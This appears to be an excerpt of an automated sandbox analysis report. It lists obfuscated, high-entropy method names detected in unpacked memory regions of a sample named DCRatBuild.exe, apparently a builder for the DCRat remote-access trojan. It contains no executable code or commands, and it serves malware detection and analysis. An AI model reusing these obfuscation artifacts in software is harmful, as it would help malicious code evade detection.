              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, EWcsSUr0fAoCVl1wmAU.csHigh entropy of concatenated method names: 'q4Y', '_71O', '_6H6', 'dIFX9wtMi4', '_13H', 'I64', '_67a', '_71t', 'fEj', '_9OJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, fsZkwSZXHf0Xv0mVD5.csHigh entropy of concatenated method names: '_8Ok', 'YZ8', 'InF', 'G9C', 'Oql8cXH7LAmjP98KowS', 'x0ysf1HlKiEJO3deNNI', 'sgROWWHwAaFOCvowtm8', 'eJRxCiHWPDv1PMQwtbd', 'BP8BaCHUtIB0aSV6r41', 'lLX9hnHNHRnYTmMc5kF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, StuS5UFYUNN3WcTAGg.csHigh entropy of concatenated method names: '_59M', 'YZ8', '_1zA', 'G9C', 'yTA5UKOTJSeqoUSRwQE', 'eHxMjoOrKPqpg2kkd6L', 'tHc9doO28bp9WPvCVyu', 'VEBBPTODGQup8f2GYLt', 'DJlw3UOtCTfkjKsJKow', 'Lp4VVeObshiWvOiWerR'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, nvHsMUGWsdX0G3LO0P.csHigh entropy of concatenated method names: 'T43', 'YZ8', '_56i', 'G9C', 'xFWXvcm3BHRuPbcvti3', 'EySrKOm1UZShrk0XtGy', 'fkySKwmckuH44Vwae3I', 'eA0l3fmGHdmFsvIjgwq', 'ly5HrKm0mcS0wgf9o4m', 'EQOC1Gm7EyT6XpvO3kk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, V8JCbEk9AccBknpBX1p.csHigh entropy of concatenated method names: 'NC1R2LKK6r', 'Ev5RDLyTB9', 'IUkRcLFwVk', 'iIYWErQ0teIJccwt6hR', 'HZeSyKQcemZSfKSpRps', 'CfQRMjQGwhytemtCSGJ', 'gMoHAHQ7qeYYPjFjO1X', 'NVpRytBwSt', 'UMuRU5rvCI', 'NGKR3yjCtM'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, lOkbQbBb0NfPWduKuZ.csHigh entropy of concatenated method names: '_3OK', 'YZ8', '_321', 'G9C', 'EZ6dhlmvqq9GG96Wpx1', 'BpkokymVojm7NBpxKOy', 'lXxDffmzuRgcNbj9RNx', 'ukMTCIO5aeG0kBJVABD', 'nJ2gnUOa0T5M4HAJkLa', 'vZA6XpOmGGO1hi50qml'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, FUvTB8XuAIE6KpJsY4R.csHigh entropy of concatenated method names: 'BefSNVSem8', 'EqlZxaMm0WqmvifengF', 'h4wD2pMOOwjOfoFVotU', 'xkEvejM5OeNjqnfLaRq', 'dsOMUrMaC54hw2fcmQd', 'B0KVKTMfjBhru3mXOUg', 'toA0KiMH56UW8awX31I', 'F8gNrRMIAAYhn86xVQm', 'dQ0SEpqDyt', 'OsoZ6RMP0S8psSloYfk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, jxUFL6rQt3GR0sxiYTL.csHigh entropy of concatenated method names: 'AYGYAKZenm', 'TIrYMOEeIL', 'Ic6Y1EBWiT', 'Y0JYIU8ZsO', 'Fk7Ya2y5cI', 'QKYYtEEuX3', 'gmju8OrCNplKkQgCTf5', 'cYNyvArpAwgWgToirKF', 'l3UnQ0rhEKf7SCqxMhj', 'ejyQhqrgrOeqX9MfHIN'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, gxlrpek1LvGoYoBLo6h.csHigh entropy of concatenated method names: 'sg9', 'bZ1G5YLGSg', 'wyxFtydHyD', 'loOGpZRDcv', 'nI3onRjCVIhSrqcmBqJ', 'lxKnfMjgtJ3wk4d2sA9', 'vmRpWDjSane75GQFNv2', 'goD72QjpvgusU3qTXx3', 'bCDGWKjhelJZKegbbsM', 'Q8VcMEjsb2OHqmcylMp'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, MTJPGvHNe9SAZAXfcK.csHigh entropy of concatenated method names: '_52Y', 'YZ8', 'Eg4', 'G9C', 'BqK4hu3qM', 'chxPjRmNaj7BlMQxeeX', 'dUeau1mx2OfKUujpr1h', 'fu2u5RmQyOsNtVmO3vg', 'GKq1Skm93xrM2CT7s8G', 'IetaQPmjiuPBlafPsC2'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ikXWGe4UA9BrWQEbsnG.csHigh entropy of concatenated method names: 'ibIjYD8vpq', 'OtvjXth9sU', 'H2CjHNVbiY', 'IVXjuM4e4A', 'LlQj5eh1u3', 'rXMj6IKTlX', 'w6Zj0NrXlp', 'gbbjvrDwDU', 'vfXjjN1TMt', 'jEojdo4Ykv'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uZ0L4x5Hfw6UKScHjWP.csHigh entropy of concatenated method names: '_159', 'rI9', '_2Cj', 'NZNuXBaZH3', 'HA2uHS0u9T', 'pvcuuJMb7N', 'w75u5DP9pl', 'nNIu6CWViJ', 'Venu04Kcjp', 'YcT0EuurW7Z5pjO8KJy'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, OJZPS1kZg5X8hT0kG6M.csHigh entropy of concatenated method names: '_3VT', 'O5t', '_1W5', 'HgWifOVYc5', 'nOCGsp0COO', 'BPOix6JvR8', 'lJMG2m3Tse', 'I7oIS7Z232TD1L3nwGb', 'sJag91ZDxgTveZvm1pG', 'iLsUSXZThLdkHHdL8E3'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, LM6iZlrc3Q8eNxGK50m.csHigh entropy of concatenated method names: 'zaeYsMFgRk', 'XXiYNJlrvy', 'OOVYnyP0vI', 'CnFWjJroeIf8bjIkBP3', 'VxqMDlrdYr5ps40e2gU', 'DJQqSgr87FwcLA2gA9L', 'CLpJAJrTTN8XV0I95vi', 'Ejnb54rrKpkI2mv2ouM'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, kGWL5KDSskg6lsJK6ms.csHigh entropy of concatenated method names: 'JJwxcrm7uM', 'NarxPLRLSq', 'foNxByZNE2', 'YN0xZP6dTM', 'tACx4fFvJH', 'SpQLNCBV0dSDXRPtxpZ', 'EtRMNrBzyJYM0xbMLc3', 'GM97B5BXRFXYvq4TYwM', 'kuaTtVBviEfWQTexKS3', 'BxsTeyn5pmxKOxrK4Li'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uD1CEWXcCe05jYVwLlt.csHigh entropy of concatenated method names: 'GvP', 'YZ8', 'bp6', 'G9C', 'sJbbV2PTd9lw7kmcXcf', 'pBPLgvPrUGolZtICfYL', 'DVq9U9P2tKYY5ZKhqGL', 'HmRXcCPDIF9fQ82lCTW', 'AFpk4bPt90yQ5KG8FqR', 'euIAfJPbAvGwQsuUabc'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, KyOTmgriHr2hnFRE7We.csHigh entropy of concatenated method names: 'dFjYZU8M0l', 'Tw5Y4RX1Ow', 'TeoYVur8xX', 'aOsYopxaj2', 'WgtYr7lEkZ', 'iwBllprKJ0nmGABStXO', 'rcqMYkrn3vV39EsJh57', 'nKtBknrYgMGmwIU9eNB', 'ttOIS9rE4iHEKsn4c9T', 'b51YgCrqaIAXJuX4JCo'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, dshDBGXU7CTxFAQ7LDy.csHigh entropy of concatenated method names: 'p23', 'YZ8', 'Gog', 'G9C', 'UqSAn26hIeiWumHmUBg', 'BDNKpN6CDAdSCDxoYg1', 'GMRXxE6g3mNhaeQ6O7q', 'jEejwo6S03EeFIASZJ7', 'G891ka6sQO3nxf13vOi', 'ikDPLe6ecFxd93MfwVq'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Cgq2kvzosEAKCPyPAH.csHigh entropy of concatenated method names: 'Y29', 'YZ8', 'jn6', 'G9C', 'LFElhQIO4TyZseuaabr', 'miirRgIfHHUcSfONAiW', 'OLZXc3IHYj0o99osII6', 'DoS34iIIDGi86AoriD5', 'BqbvoBI4IOulXHJdqV8', 'agPVhEI669AQbmvxnui'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, GDQqU3XvsenXvHLY6L0.csHigh entropy of concatenated method names: 'aKHGSKjCGI', 'U7wGG60rol', 'wIhGbqF00I', 'zE0gIpMsp1GJNWQTfb9', 'BiMaa2MeLSdPFisOULb', 'e72fBJMgULsnDUR036G', 'j4RRIjMSaAExUSybLPk', 'atnSK3ML3rmi08lhx69', 'vDYrMPMiMYCEoAWkroe', 'TirSG3MyetO7RHV5xTH'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, eiKljD5OouuANgNXZMt.csHigh entropy of concatenated method names: 'aEjQAORfXTN5S7yjuEU', 'MRAkIhRHeJB0bdcQhnX', 'oy3HS0RmJWQZcYHAhCd', 'IRFVbuROCN9rK38XY5P', 'HxmuDUeyii', 'WM4', '_499', 'PNOucrvbDy', 'BEVuPw9WKO', 'RaxuBHVbam'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Oerw6JMJ8naxclaQ7Wt.csHigh entropy of concatenated method names: 'k8FKmB5qJt', 'b7NKQb5MGD', 'R3aKJ3u49p', 'CLZK9STSgB', 'JeHKYlx0LP', 'JDt3Cnl5HtuVTTFJLsS', 'Nt9hUulaWQRCiTbuViW', 'xDPHtG7VJd5g7oWRnVp', 'eArFiF7zkTrofasD8aK', 'YHN2EflmYh0IsAbxgid'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, R7jPP7ImnklP4rRFTd.csHigh entropy of concatenated method names: 'kcq', 'YZ8', '_4bQ', 'G9C', 'hnMETjHItvYbiaLlYDV', 'Ef8hF3H4F0L4wHGGS3I', 'Lg5IKTH6OWLrn6sK4Yn', 'UnywjKHPIlwXys8n2n2', 'YC9strHMmurs6kxuPKq', 'KTx4UJH3hoajiFMSPOt'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, qtGSCFtKy5HjO36b70.csHigh entropy of concatenated method names: 'P37', 'YZ8', 'b2I', 'G9C', 'jLRxEYfRk6ZRYw3EXxC', 'AYt4IEfkMRcw18mGZvW', 'kkNJuLfpWTscvgZhijK', 'SFoNMGfhG4DyAPa2gRj', 'iV3OmafCTqoBwEUJRiw', 'cIdceCfgJMVcjqXkfuC'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, n0pvB6kIpyvFRJXXn7k.csHigh entropy of concatenated method names: '_9YY', '_57I', 'w51', 'N2TGuQXamJ', '_168', 'LXqI3CZBabtGkBnCwk4', 'YPKVP9ZngfkKnPydbqO', 'hjXfsDZYW8jMJNdFPwS', 'WuP2RrZK2nhUWUsAQ94', 'we7nvLZE8KgQ4pmsxNZ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, nhfg4RkyLVj5ML4FnpW.csHigh entropy of concatenated method names: 'fcqRqu9D7v', 'rvsRpuw3vT', 'SZlRhMv1ro', 'N6xu3DQpQqC5Fu9HoMU', 'fyQ4fkQhqnyKnhdOqS6', 'kJ5O7pQCaZcSZFZIdoL', 'WSPUenQgYYiWnKZuCV2', 'agDLM2QSLGFPXE5OgAM', 'oFDQHwQsVXci4Xrks1k', 'm6iZ3RQeScPEx0PZVmj'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, YegRPiMFsvSTUy2Ptw0.csHigh entropy of concatenated method names: '_0023Nn', 'Dispose', 'Bj3wDklYlo', 'K0swcRCkRa', 'vCJwPxEkPp', 'yp6wBEStdG', 'hlewZb2Vmj', 'FBqdPmWP5U9iY1SFK3q', 'rKnFN1WMtAsxILn93HF', 'oE2fb4W49ox1DT1U1tq'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, Oqp2h45MbLWUyY0jC2l.csHigh entropy of concatenated method names: 'lM7HRQ9ITC', 'PqMHF9mYm1', '_8r1', 'mcPHi6Q2x4', 'ksfHfmPIU4', 'klrHxWFDok', 'fKhHgDyP6K', 'h31qF1tlvDMBBc4qvOb', 'jLZwZftwZ7rqKi6ixfe', 'wZRs8EtWuns3RF0TkEW'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, uPfSZV53W3JdoE5DHk8.csHigh entropy of concatenated method names: 'qM7XNkc3Vc', 'WQkXnD5oeA', 'NmtXEvqHXH', 'QkTXqaJcu4', 'Op8XpBcY05', 'RknXh8VrsY', '_838', 'vVb', 'g24', '_9oL'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, KbcJCiXXRFZqdFTya1b.csHigh entropy of concatenated method names: 'tO4', 'YZ8', '_4kf', 'G9C', 'RWZdmAINqpWL63JJLFN', 'utPoQMIxVWQB5wXh59w', 'ErQMSOIQxIKLGvZqytP', 'lw8HkNI94AilQwJp17Y', 'OHw4kSIjcf2se1itVv4', 'V1dlrEIZ4yLOupYocol'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, DkrhvAkKQqbxVpf8sH6.csHigh entropy of concatenated method names: 'MLBp6VJr2q2FuGVHYUC', 'UcCI1CJ2ZatwrmC8h6l', 'FsUulOJoaTnjWcJTkrt', 'uF8tMdJTDlBnlM7gBa0', 'IWF', 'j72', 'KCli3w53G6', 'HQAi7WIDGG', 'j4z', 'u0fiL2niwR'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, M3xuuMru7yvhEBnL6WJ.csHigh entropy of concatenated method names: 'sY8YEn9dLh', 'oTaYqNthj9', 'vaSYpDBLoI', 'jHy4nqrtsuJLVaGuBmH', 'jium6ir20tb9x0apE3m', 'bY4SLArDMQBHiglT9GZ', 'pVbkbBrbTq3Mq8hwbu7', 'NLY78kruFMhaRra42OC', 'T7HdcwrRQqMreTCeuX8', 'TA7BH7rkrr0sfOKy12Y'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, deeUvwDr1F0DQZu6DkX.csHigh entropy of concatenated method names: 'aYUx3fSue8', 'NSYy5ABUXilRqy94S45', 'Hje8g1BN0Wge0IhikWm', 'FrhEGXBwJWpXigapZue', 'wjTpJHBWVFXucXpkYJA', 'gUlivCSevW', 'vyxijcp6gk', 'jK4idsomhJ', 'dVhi2SbvUv', 'bAbiDeyID4'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, QG5wveM3LgkoM4utFO8.csHigh entropy of concatenated method names: 'THTGXd54g9', 'LlnGH5wW38', 'HFZGuN2Mgo', 'nv9BTD1dgwBKgByOLNj', 'y7fX8h18fEFCBgc8XqO', 'Onv1mq1oBLmQhg26G9W', 'Yrd5wn1TEMkNcyAEmG9', 'E7jAev1ryLaiPvkh729', 'zILvO712iw2MYYQe8uM', 'o7j94J1FOfS3efTjw4g'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ySyEcdMc0cni3Q58xjX.csHigh entropy of concatenated method names: 'od4KtMd6Yi', 'Y2lK8xg4k2', 'jCiKzoD0sQ', 'X16wTqpAsA', 'UwLwSyR5k7', 'oLFwGDe24B', 'reSwbGbcxO', 'MiHwKKbr6M', 'dTxwwj6hoI', 'oH920mliUAsW1ssDfOk'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, WHDInNVdHmUBgCtoi3.csHigh entropy of concatenated method names: '_468', 'YZ8', '_2M1', 'G9C', 'lRiwWhfWeGWb0mDrG9U', 'VbUZWgfUSbQvyaC9Pdv', 'ICG68jfN3L5tep3x9te', 'qe9ecBfxsxNcVLMCxHG', 'g2iXBifQjT1ktviJioY', 'LPXijIf9ZCCgMmrLF6Y'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, PNKNrn423aLw7YTXAHt.csHigh entropy of concatenated method names: 'yucBDaMMP3ECX', 'vyn36Op7S1eDK6Fo3vm', 'pnZE9MplapgQxsowx5a', 'jENnnCpwTNPEY3Vp3hK', 'ihRwU9pWoLl7mLENj3c', 'aylK7HpUuVITtLZewJ3', 'ACAK56pGZ4qlfa905XL', 'jYtERip0o4e4prA4nqU', 'SmhZAJpNrGMGPNDmgmS', 'JUVss3pxOBiloqjaAk4'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, AnGUVdD2JESKqb0kjLg.csHigh entropy of concatenated method names: '_4J6', '_5Di', '_1y5', '_77a', '_1X1', '_7fn', 'OUK', '_8S4', 'wUn', '_447'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, vuI9WhDKcr3MwVZ4Abr.csHigh entropy of concatenated method names: 'PJ0yXvkQrk', 'c2xyuTMi4d', 'NrpykOciTD', 'dZNylap7gw', 'KvQyyJeyCO', 'VyfyUegaNa', 'gSMy3CSdEb', 'NAMy7HomTk', 'jUEyLnimSX', 'DHGyCFxrR9'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, GctDFZX41lS9Uo7uuCY.csHigh entropy of concatenated method names: '_6H9', 'YZ8', '_66N', 'G9C', 'Uwr5vTIiWjwcYngGWgJ', 'EUOf6qIyRhpmwSklL7m', 'qtXKpFIXRMHDIQ694xi', 'ywMN29IvZpCnhPQB7UT', 'eHYtqUIV6jXNMrdXFGA', 'CHpih9IzPL6s86wDmCF'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, SktYJqkXLPIuQ6Awout.csHigh entropy of concatenated method names: 'RtgW0UJt9s', 'RGpWvSvxAq', 'b3tWjZ0iKr', 'IdLWdrXJSJ', 'U8jTFMUzVvcqdI1HDjd', 'gqIyrTUvLaDLButUU8H', 'Rj60hxUVqjy7YSgvJ9G', 'L0Duk7N5w2id9lXCrtM', 'SGCSJpNaFDhAOPNv3yE', 'bKiUWeNmtNZykJXx0KV'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, mlk1UZXKuLKF5JDXCmf.csHigh entropy of concatenated method names: 'HGHGCC3pnt', 'PMFKAG1IJLMsJP3rFBV', 'DyTFnY148eUATHh7Dhw', 'g9ntY81fRStEYuH89Hk', 'uM31K61H2MmaPPqQadm', 'dgVBDP16hIGdOjUYfM0', '_5q7', 'YZ8', '_6kf', 'G9C'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, iRKR1nXyR9O1jxumahV.csHigh entropy of concatenated method names: '_981', 'YZ8', 'd52', 'G9C', 'cHpum34egfeTIb4Sdnd', 'B0ZuOV4LPImaZwJi5Pg', 'GqSZAQ4ignGH9u1iMlC', 'Jc6Cm34yLoeihFSreTE', 'EFfQsp4XpefdbH3GNQd', 'H6FAd54v2U1f0BGelAZ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, wxlCxPkYywwxbY5Yf0k.csHigh entropy of concatenated method names: 'g7dFy6Ru26', 'lReFUD5c13', 'cyGF3XyeVy', 'e9682U9RXr0kVildrd2', 'fLRWS79bisoSP8SVcBf', 'btb3vu9u3Kp8mbLFUZJ', 'JxUxBY9kYiRotWnW9FZ', 'lH0FeK09an', 'hBkFWPSYgL', 'JrKFRdjvJJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, MsBg6K5RkP1uMJ0tCH3.csHigh entropy of concatenated method names: 'UvL0J4QlU4', '_1kO', '_9v4', '_294', 'fiN09k7ww6', 'euj', 'XqY0YcsQHH', 'IU70XKQPcs', 'o87', 'VDG0HBWOOJ'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, L7trMlXk084m2iRiuOD.csHigh entropy of concatenated method names: 'R1x', 'YZ8', '_8U7', 'G9C', 'BR8JGxIqowvt7Evqt19', 'keGBxsIFCHwBPCI5TN7', 'GSSyCmIAp3nSaWM96iD', 'ycCsxQIdyhWFEUgsE74', 'iZ8ZkAI8MLwxvQmFqlQ', 'zUuFbOIoXb5oGaNA3H6'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, svkKVPMTtQZgVyRGCYB.csHigh entropy of concatenated method names: 'kyJbtL3ClB', 'nx0b8UxLc4', 'A2hty50NULorsvmYhWY', 'H9mMBL0xEHgKSEnn91C', 'Ad1cMr0QfJVKsmbaAGZ', 'gmvSbw09DVsSVLAmhBR', 'Rfq8Lv0jNDScGRXA51l', 'adcMhi0ZY4tiPAm4qck', 'qWWd9F0JOsEahB0IXiB', 'tASqwt0B6pEBFET5id8'
              Source: 3.3.DCRatBuild.exe.69ce5b3.0.raw.unpack, ooLRuLDTQX9YMad3xl6.csHigh entropy of concatenated method names: 'H4jgKJkYAu', 'FHhgwE3xbA', 'HK2geNLcgF', 'nvs919nwtCcbuDT8nsk', 'gxZT8SnWWtulfk6mvda', 'uT6bbsn7Uwg26WXLo5F', 'vhSGs1nlEpxaj5Y1eCs', 'ytCVTinUVrwV5p5iGvR', 'jGRfplnNuYGdd7vWY61', 'Ja6i2inxwKKaSGQ0irC'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, tdSiuSDaMjdFhUgObFS.csHigh entropy of concatenated method names: '_7zt', 'CAWgCouuRT', 'FiOgOxJ2Ic', 'hm9gmDRRuk', 'IFTgQATEFT', 'GOqgJBmSRA', 'A2pg9tZUAj', 'sL5A1Tnjpg1I6KAh5in', 'qFLXaQnZwokYb4IMZDT', 'fZUM3JnQMt4eIqbLCE6'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, HXrR7qkDf0Fi44gKRJ1.csHigh entropy of concatenated method names: 'e36WodF6qn', 'BomWrZ1cQ6', 'f7kWsm91HQ', 'hU9WNDvEV5', 'gicWn7kr3a', 'GusWEUwNi6', 'VbERsCNEsbVvwLT3E8l', 'nuXd0tNYMynGG8wqfmK', 'PLdKXUNKU71c8nA26UN', 'FynVwTNqk8oApSdk9IO'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, sUnRYVCiRw8ZadMnWY.csHigh entropy of concatenated method names: '_52U', 'YZ8', 'M5A', 'G9C', 'eesWWSHL2drSBDxLvHx', 'e5ixO3Hif2IyBL8oXHk', 'lkOLIjHyMND9eVFt8kt', 'yWuxy2HXLqTRVwabTl9', 'icySvEHvFnnujmKhkEp', 'TBl8KRHVnv5cYtsyOA8'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SjZBBJ5sEtuH684DtpW.csHigh entropy of concatenated method names: 'IA46Babn9r', 'CGjf62RqTUdOAnDWAeJ', 'mi7i8JRFJRjjgBOer4s', 'qjWWjdRKw2L8c98uleN', 'sRVND8REEVZMLcZ5AN1', '_1fi', 'nbt5hL8cDK', '_676', 'IG9', 'mdP'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, GZZEGKMLLRQu2sDQVI6.csHigh entropy of concatenated method names: 'dXvKkCwReb', 'pgNKlaDXgI', 'od4gx77JRkEwkIYiSxl', 'IuZisN7BgCVVkhfRnYJ', 'cc5v657jQLLp1BWJJpE', 'ShK5Vq7Zlj9nyhh257i', 'rZ7Eoa7ncoa1UKi9sb1', 'ElUsZO7YAVNsWOK9rTf', 'eZo7tT7K2mE1s6QfHoM', 'o6447F7E2i6FZmUM5PF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, riAopur7oofVq4YBIsv.csHigh entropy of concatenated method names: 'fcvX5IbfyE', 'dPIX62rJPJ', 'F8e', 'bLw', 'U96', '_71a', 'O52', 'RwsX0vKd1B', '_5f9', 'A6Y'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, U6p1FPktFl1cR68DAXN.csHigh entropy of concatenated method names: 'oYo', '_1Z5', 'MnuGbGZN2g', 'zFFiKA9VAS', 'CdoGTDWYvq', 'LIB7tKZG67C8qLAqHry', 'PyrMX0Z0rhY2OHO3sci', 'bpRZqkZ7Jt0eZ84UlL5', 'FtK96aZlo04C5lWhAXC', 's5odbAZwnSQGilF4fW1'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, SYyIg6MMNfhQnewQRgt.csHigh entropy of concatenated method names: 'ChaGEenalh', 'IGfGqgsEik', 'GOhGpxWWxI', 'lrMGhCwdhd', 'mL6GAQcDvv', 'LXuGM7npwF', 'yBQbU7cW7gb19veHuMy', 'Q9ZjFAcUaZu3FVR8NS7', 'bFcvYDclh6Gd6gqWl03', 'zFVhk0cwixSqsAMBih0'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, hymEolDmJCDvG7pXDtp.csHigh entropy of concatenated method names: 'tSeltxcyPc', 'i9AlDhqPgR', 'CFMlccHFFv', 'lvOlPgEFn2', 'rmBlBYU1F5', 'DSAlZSvLAu', 'TQWl4s3XpV', 'yo1lVo9PqV', 'GcCloWPGvP', 'Nghlrtd830'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, hUcm6qDlM5iRY6t5U0Z.csHigh entropy of concatenated method names: 'uxk', 'q7W', '_327', '_958', '_4Oz', 'r6z', 'r7o', 'Z83', 'L5N', 'VTw'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, C1tlcgkbm50McP14eAR.csHigh entropy of concatenated method names: 'ydARA5iYeC', 'Kb9RMriUZL', 'oh9R1jrJDq', 'dgIRIU0ucH', 'opBRaryXXg', 'sORh249Iey3O5e47ZWF', 'yypsmX942W1Rbx2TpMD', 'flMnAN9fRBiVxDl4rYZ', 'r27pT79HnGWKaWlDLsQ', 'rOurow96L6fan0k31ZP'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, CRcZ1XDiyfXWALjR5J3.csHigh entropy of concatenated method names: 'wZZk20uRwD', 'Bi2kDRvQ77', 'LS3kcPYUjS', 'NlZkPsUJxD', 'c8okB4B5sP', 'RjjcaWYNin3kNQ76EbC', 'xRdE4rYWxavD8pE5xhl', 'jgUo1QYUnLPIeTWuND3', 'qSm2jBYxQNuH8KdqAtX', 'Y9TSfkYQX0VKtd7AHiF'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, iu9NfPXI5EJAe19Mmf9.csHigh entropy of concatenated method names: '_625', 'YZ8', '_9pX', 'G9C', 'jJuMMx3QthFpeh7OpUV', 'KO5R6v39bTLoqYh5Tgv', 'OwGwHB3jxGX6bfPokwO', 'LXHqtN3ZWI1luEvvpGM', 'GyvG0X3JeAxc3cAZfCu', 'PCfRLs3B0uFF6nfCAhn'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, DT03pUXYIEy4GFhTafP.csHigh entropy of concatenated method names: 'UCsS0lJoXU', 'p0Kolg6WpotpXc8DdEP', 'es9Qp46UQSUr80kfIAa', 'x1xiag6l0LE6lRmCCB6', 'BdF3Fi6wlEVGSDqiguV', 'jAXDsY6NVnZyGW3n77E', 'C2yeEB6x4TTtA2WjQkc', 'ryB5Rq6QJ8diqkmNdec', 'C0xyLY699en6BGrnnVo', 'f28'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, yIhTZoX797Z8Liv5h9K.csHigh entropy of concatenated method names: 'yAyGJjBb8c', 'slXG9ROQqC', 'EqgGYgqMi5', 'dFw2Qe13iEn4Vk5pDy8', 'AHmTU01PYkgFWoBNYEQ', 'VsvjVx1MQm0meWTQ1mW', 'A3avUQ11YvTE0ld3bdt', 'gJjDu41cU0BcFBuYXcM', 'gsueuR1GiU5mPvpWXtX', 'ylY4cn10rtoxmrNmxdP'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vOUSlNrluZFMtRC00b1.csHigh entropy of concatenated method names: 'JUUYOvFZZT', 'Mv2YmVcCp8', 'dZ6gBbTLh4nWhd37bkw', 'Mx1vSCTiPLlt6PTPt2E', 'qDetnYTyEC91haLh9vQ', 'eBVL4XTXM2MVgVHjYaK', 'EVMEpTTv7Jvr4TyomEc', 'KpjBgSTVwbd8WFo04HE', 'jE7O2ETzfVjGu8JXRVb', 'sFuUIer5SZB3Sh8m0er'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, U5c5ALXZYnNckYqevqc.csHigh entropy of concatenated method names: '_7v4', 'YZ8', '_888', 'G9C', 'f09U5t3ARcqrBrpVEYD', 'ct2y2e3dnrycLrh6NaX', 'MobS5m38985beDy6WNj', 'nUebAf3oHQ1O4dk9Q5g', 'IgQk6P3TKMToUJ8Bvwc', 'NhSq7Y3rEjOFCh1y78t'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, vdTvwykPKYw0ihdLp6t.csHigh entropy of concatenated method names: '_525', 'L97', '_3t2', 'UL2', '_6V2', '_968', 'BL6EZHjGgpFPFb4Ba8m', 's9EZ0hj0QajvLceDhuS', 'Vexvujj7qbyaXMsTmO4', 'sghfZnjleEPGRHdp6XX'
              Source: 3.3.DCRatBuild.exe.536e5b3.1.raw.unpack, lw6lLjDnqcnsu0RQKqd.csHigh entropy of concatenated method names: 'A9Ug2VnJNn', 'VyWgDjqVxr', 'A5IgcGped8', 'MqDgP0KB6M', 'tVogB3VWXJ', 'sQGu0wnoFcft6FDgbmy', 'DgbTtOnTIYbnD6NAlHx', 'GHxGkundYyImpZjeTRF', 'EyaAW5n8vjXRJIHJva0', 'Vvq9H2nr91VqCaFAZ7K'
